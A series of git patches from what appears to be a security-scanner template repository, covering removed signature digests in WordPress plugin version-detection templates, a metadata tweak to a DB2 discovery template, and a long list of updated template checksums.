@@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee0d5efebdfef7ca0da3445b481e4646a50979662117399006be28bc5b4d97a1022100bb86838eee07c7c0833a8ad84be639447e5b2de9af7d8868e7ef6311cc972030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index a18ca34acf..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fc7fd3ba5de0c5e31cac3d07d51a50dcc4b61034728a097250cd2c03ab3e86eb022100c93614290fce9171d7b98b334a77bd381022628fef3a6b99bae5b78fea42588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 23e7898281..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022003077b580da7c820c11563f163ad0cce3bad7fcb9f775997be8c55b64c7f3dc40220442b160824cd09f65db8a68e809e8cb9f66e300bfe38ecf88f92de12116e6a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index e57121a67d..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2319acf8cb39e01cf47d13cdbb4d8ba87d6ddcbb1c5128577574f2093608a970220095049155a6ed1a936cadc7dcb6225771b700859da00645a7bfa761dae37e289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 760a82e7fd..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7c05b849903f8e983226de459d5d1d7b1c49d5453d4e3e499a1a31373b4865e0220596d25e676c6412791ffd21e5b674f619f7920b7d55afd730f0ec20be7af808e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c620da7c98e07599f11c4f33445d40d4667ee678 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Aug 2024 17:47:30 +0530 Subject: [PATCH 1834/1841] Update db2-discover.yaml --- javascript/udp/detection/db2-discover.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/javascript/udp/detection/db2-discover.yaml b/javascript/udp/detection/db2-discover.yaml index 5d962a6af1..097d576cee 100644 --- a/javascript/udp/detection/db2-discover.yaml +++ b/javascript/udp/detection/db2-discover.yaml @@ -10,6 +10,8 @@ info: - https://nmap.org/nsedoc/scripts/broadcast-db2-discover.html metadata: shodan-query: port:523 + verified: true + max-request: 1 tags: ibm,network,js,udp javascript: From c0b90a57bed0eefe9fe8adc4fd0a114462c81f98 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 2 Aug 2024 12:42:25 +0000 Subject: [PATCH 1835/1841] Auto Generated New Template Addition List [Fri Aug 2 12:42:25 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1cbdbe1270..ae51f66be1 100644 --- a/.new-additions +++ b/.new-additions @@ -22,3 +22,4 @@ http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml javascript/misconfiguration/x11/x11-unauth-access.yaml +javascript/udp/detection/db2-discover.yaml From ba728ff583c574583a93514adc90b96cf6b4a225 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Aug 2024 12:42:35 +0000 Subject: [PATCH 1836/1841] Auto Generated Templates Checksum [Fri Aug 2 12:42:35 UTC 2024] :robot: --- templates-checksum.txt | 423 +++++++++++++++++++++-------------------- 1 file changed, 212 insertions(+), 211 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 319ff80c78..14af6000f8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -738,10 +738,10 @@ helpers/wordpress/plugins/ad-inserter.txt:f877a4a8ab02364267e9ac08e5a43ed3eb6f22 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:4d8fa21645bb09d6fe70b894a8fc47e15acf875e +helpers/wordpress/plugins/advanced-custom-fields.txt:7beb3ffa42c2e11f55fd85f1627b68ae6cfe0338 helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:deb3b4d0e34b7f9fe7def52318e7a4edf3931c5d +helpers/wordpress/plugins/all-in-one-seo-pack.txt:5a5dce6f0956408ec9b3b14ca8384b90f87ea410 helpers/wordpress/plugins/all-in-one-wp-migration.txt:965640b9f3dffab46786b739a0e7857ba95ff2de helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 @@ -787,11 +787,11 @@ helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:68c9b7f7107e58a492 helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/easy-wp-smtp.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/easy-wp-smtp.txt:0c6799f2e85eccc7061443f76e45b7b268892b58 helpers/wordpress/plugins/elementor.txt:46d9b6e7bd05a9cb78d59ae12740fcd1c300f5de helpers/wordpress/plugins/elementskit-lite.txt:157d4751f6fc258dd2244da6c46a957ae64e4258 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 -helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 +helpers/wordpress/plugins/envato-elements.txt:3537bdf1582c4a071fcc868f5961e811e63f2ede helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:778d773431944dd657af2fde3406d17be92f9cfe helpers/wordpress/plugins/ewww-image-optimizer.txt:356ef5627363fd1b4d41745a26ed9916eeb9fe9b helpers/wordpress/plugins/facebook-for-woocommerce.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 @@ -852,7 +852,7 @@ helpers/wordpress/plugins/meta-box.txt:d671e38ac88381575198332ef9ebb2b70b2841f4 helpers/wordpress/plugins/metform.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ml-slider.txt:75c024ece33c58576c793ad8930682e902abfb64 helpers/wordpress/plugins/newsletter.txt:1367078ebee3d42232e6c2aaa74f83439f5d235e -helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 +helpers/wordpress/plugins/nextend-facebook-connect.txt:76352622a937abb841a04340015012a42290add0 helpers/wordpress/plugins/nextgen-gallery.txt:b4965036e178930c67affe46a8868c680bc27ea4 helpers/wordpress/plugins/ninja-forms.txt:714503a3af828a0db664fd44681d548aba3ee3a7 helpers/wordpress/plugins/ocean-extra.txt:dabb01b74fbe3c51012121a2802b2694c9968fc7 @@ -881,8 +881,8 @@ helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d179 helpers/wordpress/plugins/royal-elementor-addons.txt:2c41dc2f1e32157c60aaaa5ee56094386d5c4194 helpers/wordpress/plugins/safe-svg.txt:5da596d45f9d6516efc24f110a7c87475a984016 helpers/wordpress/plugins/seo-by-rank-math.txt:cdcb03d225c2988be05a11790f05f0e9c2751925 -helpers/wordpress/plugins/sg-cachepress.txt:bdca50b5cb1feb03950b48f4419acb02a57783cb -helpers/wordpress/plugins/sg-security.txt:29cd3f50fdf56b43132cb011be27e5a2567b76ae +helpers/wordpress/plugins/sg-cachepress.txt:820dff3b9bbcc0e2a4b8d4d5687aa942a26b2356 +helpers/wordpress/plugins/sg-security.txt:c5a76ffee48786649f498fcb3cd620fad7c6c2da helpers/wordpress/plugins/shortcodes-ultimate.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b @@ -896,7 +896,7 @@ helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99 helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:a1231facbb4b8314300cb531105cd765f90c95f1 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:6c75863a2a166bfaf866032133ae1ec337f07572 helpers/wordpress/plugins/sucuri-scanner.txt:381bb12da04a82580bb6d698b8798743668826bd -helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 +helpers/wordpress/plugins/svg-support.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6 helpers/wordpress/plugins/table-of-contents-plus.txt:412a33ae14746612317b013dc23213cd79b5f3f3 helpers/wordpress/plugins/tablepress.txt:98a16af997b52cb888232ab5d79a527b0716561c helpers/wordpress/plugins/taxonomy-terms-order.txt:d176141136f1fe969aeca56eb98e3734f24199ae @@ -905,7 +905,7 @@ helpers/wordpress/plugins/the-events-calendar.txt:feefc741fbf96de5f08ce123f923cd helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:036622d5a32b0e5099f20d8cff7515dc042253aa -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:480da60c093184bf0f5f182f5e48a8389a98ab75 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:6ef3be477b8824232190042773457096eeff911b helpers/wordpress/plugins/under-construction-page.txt:93c73a1987305f0a1f548b0025a3cb9e15bf420f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:e091c0a7d31789d70b4711b992ca9a2e1e822cea @@ -3515,7 +3515,7 @@ http/cves/2024/CVE-2024-39907.yaml:451e6402d65c267c32597f47c71b31f70efe48c5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 -http/cves/2024/CVE-2024-41107.yaml:0671aa1827fbb830e71628760ec5e81a3939626c +http/cves/2024/CVE-2024-41107.yaml:7c4057d0aa1194d6bfcd0c1e5a42a5c49f44d30a http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -7349,230 +7349,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:a7399d933cd777d4e4695fbe2c3a9f4ddbc57148 -http/technologies/wordpress/plugins/add-to-any.yaml:e2f856286ff23eedc328e4f4ba32d7fa48f5cd2b -http/technologies/wordpress/plugins/admin-menu-editor.yaml:83b3d189e29a297c3f41a9c8c08bc3f25b9a2398 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:f4ac6890d2473dcfaf7558ea1bbbc05a12228be1 -http/technologies/wordpress/plugins/akismet.yaml:97eb9b9f4e8b921916a950f79d2134bc8bc1a31b +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0da9a23cd18187d71aa15d93f91a47fb823c4af0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:74ab97c440b0cd01b4393d10d6c55b6555cd47c8 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:e1b4d915222688cd6167c362ada305ea1fb836fb -http/technologies/wordpress/plugins/amp.yaml:dcbe99091dfa4f849f0e8eeacc903bb134ee3c84 -http/technologies/wordpress/plugins/antispam-bee.yaml:7232d9fe113d3cd34563e8e51ee8c0d21cb0a02c -http/technologies/wordpress/plugins/astra-sites.yaml:bf1d3cacfd76664853a92f305a3945a4573c7b5d +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:2022b022d6aac14e16b2c63991205fd7776d7b53 -http/technologies/wordpress/plugins/backwpup.yaml:c08a26b568e7b18a67ad70353b53d9b673382151 -http/technologies/wordpress/plugins/better-search-replace.yaml:6ee23047ab6ad1f45ac5c5b5bf73963e82108536 -http/technologies/wordpress/plugins/better-wp-security.yaml:51b09a10f8c4ce8d9d6abcd63030a2f0419d91e4 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:2ed755e6dfd670b8e82bc45e826e5ee597dcbfc3 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:a4546d17e59569acda32f2a13969894e2a52e344 -http/technologies/wordpress/plugins/breeze.yaml:2163dac275826a6559cdc1ac3ae95326916ada43 -http/technologies/wordpress/plugins/broken-link-checker.yaml:8fb7380e76769c43157581cc5e77675654ca640b -http/technologies/wordpress/plugins/chaty.yaml:f122378fd2b85d8388f14fb71d0c0fabca7a9bf8 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:cd805effe0104eb403c9b0d9f77c4f48de3118a6 -http/technologies/wordpress/plugins/classic-editor.yaml:d95a3180abfdead614206b4113ffa74d26224ed9 -http/technologies/wordpress/plugins/classic-widgets.yaml:9de68f2a9b76e41888238f36e5d3c6639ea7d807 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ced77213e30aa52e390722afff58ead2e8d65e5c +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:2597865450d66e10f5f62e44d705e8d69f520f8a -http/technologies/wordpress/plugins/coblocks.yaml:51ebfc0470b7d820e2a21c470053af9b6f826ccc -http/technologies/wordpress/plugins/code-snippets.yaml:8462ae7334b6caecae0a9dc73c2de98a16b71f7d -http/technologies/wordpress/plugins/coming-soon.yaml:99d36a3a1c7c195b91b5a980b5d8e9f66f9162b7 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:7f69cc13f3a9590199bd8d273a026e11be8f54db -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:4bf4e694f89a21a45dd5fb4f7baf4fada18ec952 -http/technologies/wordpress/plugins/contact-form-7.yaml:b399fae9f59c1d4361d56811a81c3e4b89f460d1 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ef1a59d58af3dc001de053d354aaa87e57fd7613 -http/technologies/wordpress/plugins/cookie-law-info.yaml:524dbe469b9c75d077ea555ecf847478a53dfbff -http/technologies/wordpress/plugins/cookie-notice.yaml:dc5f38150b5cfb5e854a6c427a7ad85599444a24 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:e089dc53fe97b7ace17f5fdf59cc076193884dbc -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a07d07cf4f1f00331d0da2e2d1e8acf54012b6bd -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9da76b827bc9c21d9693b40446b747771e5609ed -http/technologies/wordpress/plugins/custom-css-js.yaml:feeab2964554748054c33cbc0fa66ca4d813f4f0 -http/technologies/wordpress/plugins/custom-fonts.yaml:e2896f53fdb980cae89c91d7c2d2dc0758a16715 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:927a9043a4c4e76809bf2b5509711a89b5c78cf7 -http/technologies/wordpress/plugins/disable-comments.yaml:aff8fa7bcc48c733150065413c2ba1cd3fd9072a -http/technologies/wordpress/plugins/disable-gutenberg.yaml:005b2d00eb96c200e7d2d88f83f56734b3a9c74e -http/technologies/wordpress/plugins/duplicate-page.yaml:5777b971597212a5a65e2563be4a368852a88ed2 -http/technologies/wordpress/plugins/duplicate-post.yaml:553c1f0d1728e363e2b986617c35ee575ac446cf -http/technologies/wordpress/plugins/duplicator.yaml:8a3b14dd7e8a24ed53e48050860ec962179c8ede -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e4dfa8503e8d86e7d6094951e508e674813093d +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:fac965ff270534808a0659437e09949e27ff9540 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:fe8a5d6aa6cd3c168916b399dc37de957bff9906 -http/technologies/wordpress/plugins/elementor.yaml:7a2af05a487f6b82a842f53c6a0ed29f3ac6cece -http/technologies/wordpress/plugins/elementskit-lite.yaml:091b453088f5bacd8cd7b20b7ee12e6600a3a6f7 -http/technologies/wordpress/plugins/enable-media-replace.yaml:0f060669af6b373303fb7c636a64bc8511581ef8 -http/technologies/wordpress/plugins/envato-elements.yaml:c02673320df7b80c5f77d2464f4bba83148caad0 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1ec19b953e5e74985a792c9fe4884bc69c3e6833 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e0affef2e5ba688f6841722c11c52c84d53db488 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:b27c15756d36f2be9b43f7a097e23377dba79a33 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:6d2eed5a15209820eaedba6bcbdab2500575cac3 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:0cc49dbf25a0a7d9080e1d4825f6cd6acd6e6834 -http/technologies/wordpress/plugins/flamingo.yaml:d9334baf89094f5b07aab0289a1711dae3a87dd6 -http/technologies/wordpress/plugins/fluent-smtp.yaml:8cc7975c9d2c64a5fca8c4f245384f3fa0c7e51b -http/technologies/wordpress/plugins/fluentform.yaml:b5890bf37c83fab6258b99af8dbe845f07ef3acf -http/technologies/wordpress/plugins/font-awesome.yaml:ae1d599487ce1806ae59df8d827f77a64763c952 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1cf136d21c4d9bffa36005acdc27fe93ad994a6b -http/technologies/wordpress/plugins/formidable.yaml:bba5b076cdda6a912fb70882016a7094b1fd8d63 -http/technologies/wordpress/plugins/forminator.yaml:0255e9009fd1ca173c4265da830790e42a139579 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:5985945f2db1d0fc626104992092cfdf16922780 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1af03d5d9ec6b7a6c002d1f6954f5348666a5b66 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:01e2e3c0d2caf4f678bb4071f04cc7fb4e4176c9 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:bbcc873fde4da39550f39b6395864a60c39758d0 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:fc138d7b0fb7edec4e0de898b242708b09668a19 -http/technologies/wordpress/plugins/google-site-kit.yaml:bf36db8a215214bd4ddd7601931c6776dacb73a2 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b2e49e1c7717e1cef501e0cdf5e0152764924579 -http/technologies/wordpress/plugins/gtranslate.yaml:96a24e8a6e1246b4dff48b1d1345f03b71f94a84 -http/technologies/wordpress/plugins/gutenberg.yaml:1480dd6a8b34b8b48f07f75d0783e8b62658f5e3 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a0d824611e9c9edd4b5616e651def0b9b6f31111 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 